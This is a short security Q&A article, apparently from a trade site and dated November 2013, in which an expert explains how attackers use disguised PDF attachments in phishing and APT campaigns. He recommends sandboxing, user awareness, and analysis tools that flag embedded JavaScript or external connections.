Manage Learn to apply best practices and optimize your operations.

PDF malware: How to spot, prevent emerging PDF attacks

Enterprise threats expert Nick Lewis explores emerging techniques being employed in PDF-based malware attacks and tells how to defend against them.

I've read that PDFs are increasingly being used as part of advanced persistent threat attack campaigns. Could you describe some of the latest techniques attackers use in PDF attacks, and can you suggest tools to use for scanning PDFs for malicious inclusions? Or should antimalware/email scans already be picking up on such threats?

Ask the Expert

SearchSecurity.com expert Nick Lewis is standing by to answer your questions about enterprise security threats. Submit your question via email. (All questions are anonymous.)

Advanced persistent threat (APT) attack campaigns are likely using PDF files because most regular users assume they are safe to open, as PDFs are widely accepted in both business and everyday email attachments. By using phishing emails masquerading as fax messages, scans from a multi-function printer, delivery notices, etc., the hacker is hoping to entice the user to open the "trusted"-yet-malicious file.

To mitigate these threats posed by PDF malware, it is critical to combine security awareness and technical controls, since neither method will protect all scenarios on its own.  

Simply put, traditional antimalware or email scans will not catch these new PDF malware attacks. However, security tools that open PDFs in a sandbox environment can be used to identify malicious behavior from the PDF.

Additional tools that can be used for scanning potentially malicious PDFs are described by SearchSecurity contributor Lenny Zeltser in his blog post on analyzing malicious documents. These tools can identify potentially infected JavaScript or strings for commands in the file. Once the malicious content has been extracted, it could be analyzed to determine if any external websites have downloaded other malware. Therefore, any PDF that contains JavaScript or accesses a system external to your network should be investigated.

This was last published in November 2013

Dig Deeper on Malware, virus, Trojan and spyware protection and removal

Start the conversation

Send me notifications when other members comment.

Please create a username to comment.